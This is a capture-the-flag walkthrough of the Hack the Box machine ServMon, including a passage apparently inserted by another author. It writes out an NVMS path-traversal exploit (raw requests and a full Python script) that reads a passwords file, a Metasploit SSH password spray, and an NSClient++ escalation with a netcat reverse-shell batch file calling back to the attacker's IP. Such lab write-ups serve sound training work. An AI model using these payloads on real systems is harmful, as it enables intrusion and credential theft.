Welcome back everyone! Today we are going to be doing the Hack the Box machine ServMon. It is listed as an easy Windows machine. Let's see what's in store!
As usual we start out with our full port scan:
nmap -sC -sV -p- -oA allscan 10.10.10.184
Here are our results:
We see that there is something hosted on port 80, and that anonymous login is enabled on the FTP service. So we log into the FTP server and look inside the Users folder shown in our scan. Once logged in we walk through the directory tree and find two user names, Nathan and Nadine. Each of their directories holds a file, so we download both to see what is inside.
We look at the files and see some notes:
We know that the service hosted on port 80 is NVMS. A quick searchsploit for NVMS shows a few exploits. We can mirror the last one into our working directory with:
searchsploit -m 48311
The number 48311 is the Exploit-DB ID of the exploit, which is also its file name in the local exploit database.
Once we have the exploit copied, we can look at the code. It simply prepends the standard ../ traversal sequence to the file we ask for and issues the GET. Now, when I tried to run this in Python, I ran into quite a few errors. I did a minor rewrite and was still getting errors. I plan on circling back around to this after this post :).
Since the traversal is very basic, we can replicate it in Burp Suite. We'll use the example given in the PoC from earlier. Here's the request we issue:
GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1
Host: 10.10.10.184
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: dataPort=undefined
Upgrade-Insecure-Requests: 1
Now that we know the traversal works, we need to get something of use. We read earlier that there is a Passwords.txt file on Nathan's desktop, so that is the file we fetch. Here's the request used:
GET /../../../../../../../../../../../../../Users/Nathan/Desktop/Passwords.txt HTTP/1.1
Host: 10.10.10.184
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: dataPort=undefined
Upgrade-Insecure-Requests: 1
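The two Burp requests above are enough to script the traversal ourselves. The example below is added here and is my own code, not the write-up's or the Exploit-DB PoC; it only assumes the host and port from the scan and that the service uses the request path as sent, which the Burp responses confirm. The reason it speaks raw HTTP over a socket rather than using the requests library is the check a practitioner wants to know about: requests/urllib3 (and curl, unless you pass --path-as-is) remove the ../ dot-segments from the URL before sending, so the traversal never reaches the server and you see a confusing 404.

```python
import socket
import sys

# Added example (not the page's or Exploit-DB's code). Assumes the NVMS host
# from the write-up (10.10.10.184:80) and that it serves the path exactly as
# sent, as the Burp Suite requests in the post show.


def build_traversal_request(host, target_path, depth=12):
    """Return raw HTTP/1.1 GET bytes for target_path prefixed with `depth`
    copies of "../". Built by hand on purpose: requests/urllib3 normalise
    dot-segments out of the path before sending, which silently defeats a
    traversal. Twelve levels matches the win.ini request above."""
    traversal = "../" * depth
    lines = [
        f"GET /{traversal}{target_path.lstrip('/')} HTTP/1.1",
        f"Host: {host}",
        "User-Agent: Mozilla/5.0",
        "Connection: close",
        "",
        "",  # blank line terminates the header block
    ]
    return "\r\n".join(lines).encode()


def parse_response(raw):
    """Split a raw HTTP response into (status_code, body). The body is kept
    as bytes so binary files survive; chunked framing is not decoded."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("no end of headers in response")
    status_line = head.split(b"\r\n", 1)[0].decode("ascii", errors="replace")
    parts = status_line.split(" ", 2)
    if len(parts) < 2 or not parts[1].isdigit():
        raise ValueError(f"malformed status line: {status_line!r}")
    return int(parts[1]), body


def fetch_via_traversal(host, target_path, port=80, depth=12, timeout=10):
    """Send the crafted request and read until the server closes the
    connection (we asked for Connection: close)."""
    req = build_traversal_request(host, target_path, depth)
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(req)
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return parse_response(b"".join(chunks))


if __name__ == "__main__":
    host = sys.argv[1] if len(sys.argv) > 1 else "10.10.10.184"
    # depth=13 is what the Passwords.txt request in the post used; extra
    # "../" segments are harmless once you are already at the drive root.
    for path in ("windows/win.ini", "Users/Nathan/Desktop/Passwords.txt"):
        status, body = fetch_via_traversal(host, path, depth=13)
        print(f"[{status}] {path}")
        if status == 200:
            sys.stdout.write(body.decode("utf-8", errors="replace"))
```

Run it as `python3 nvms_traversal.py 10.10.10.184`. If you prefer curl for a one-off, the equivalent is `curl --path-as-is http://10.10.10.184/../../../../../../../../../../../../windows/win.ini`; without --path-as-is curl collapses the path to /windows/win.ini.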
Now that we have a list of passwords we save them to a file and try them against the NVMS login as nadine, nathan and admin, but none work. The SSH port is open as well, so we can try the list there while we're at it. There are a few ways to do this, either the Metasploit ssh_login module or Hydra. In this case I'll use Metasploit:
msf5> use auxiliary/scanner/ssh/ssh_login
msf5> set pass_file passwords
msf5> set username Nathan
msf5> set rhost 10.10.10.184
We run the module but get no hits, so we change the username to nadine.
msf5> set username nadine
This comes back with a hit! We could have put both usernames in a file and supplied it with user_file instead of running the module twice.
We then SSH in as nadine and grab the user.txt flag.
Once we have that we start enumerating. We'll spin up a SimpleHTTPServer on our machine and download winPEAS.bat to the box. I tried a few ways of getting the file over, such as PowerShell, but it ended up being as simple as using the -o flag on the built-in curl:
curl http://10.10.14.202/winPEAS.bat -o "C:\Temp\win.bat"
Note that curl will not create the directory for you, so C:\Temp has to exist first.
We then run the file. A majority of the checks come back access denied, but there is still some useful information here. We see there is a service listening on port 8443 that doesn't match our
While the rest of the scan runs, we'll head over to port 8443 and see what is on it. Plain HTTP does not work; HTTPS is required.
Nothing seems to load on this page, however. We do another searchsploit, this time for NSClient, and get back a local Windows privilege escalation exploit. It tells us we can obtain the web password either from the nsclient.ini file or via a command.
We run the command to obtain the password:
nscp web password --display
We also look through the ini file for anything else useful. There is one more piece of information we need from it: allowed hosts is set to localhost only, so the web interface only accepts connections that originate from the box itself.
This means we'll need to set up SSH port forwarding to reach the page.
ssh -L 9000:127.0.0.1:8443 nadine@10.10.10.184
Here's a breakdown of the above command if you're new to using it.
We are telling SSH to open a listening port (-L) 9000 on our own machine and forward anything that connects to it, through the SSH session, to 127.0.0.1:8443 as seen from the remote host. The last argument, nadine@10.10.10.184, is the user and host we authenticate to. So when we open a browser and go to https://127.0.0.1:9000, the connection arrives at NSClient++ from 127.0.0.1 on the box itself, which is exactly what the allowed hosts setting permits.
Once we load the page through the tunnel, we can see the difference:
We can now log in with the password we found earlier (via the command or the .ini file). From here we can follow the PoC and escalate. First we need to create an evil.bat file as per the PoC; in this case I'll call mine rf.bat. It contains the following:
@echo off
C:\Temp\nc.exe 10.10.14.202 4444 -e cmd.exe
This batch file simply runs the netcat binary (which we'll upload next) to connect back to us with a command prompt.
Now we download nc.exe to C:\Temp the same way we copied over winPEAS:
curl http://10.10.14.202/nc.exe -o "C:\Temp\nc.exe"
Then we set up a listener on our own machine:
nc -lvnp 4444
Now we need to add a script to NSClient++ (step 5 in the PoC) that points at our batch file.
Then we schedule a task that calls the script (step 6).
Now, I would have loved to finish this box; however, this step was pretty close to impossible on public boxes. I don't plan to come back and finish this machine given the bad taste it left.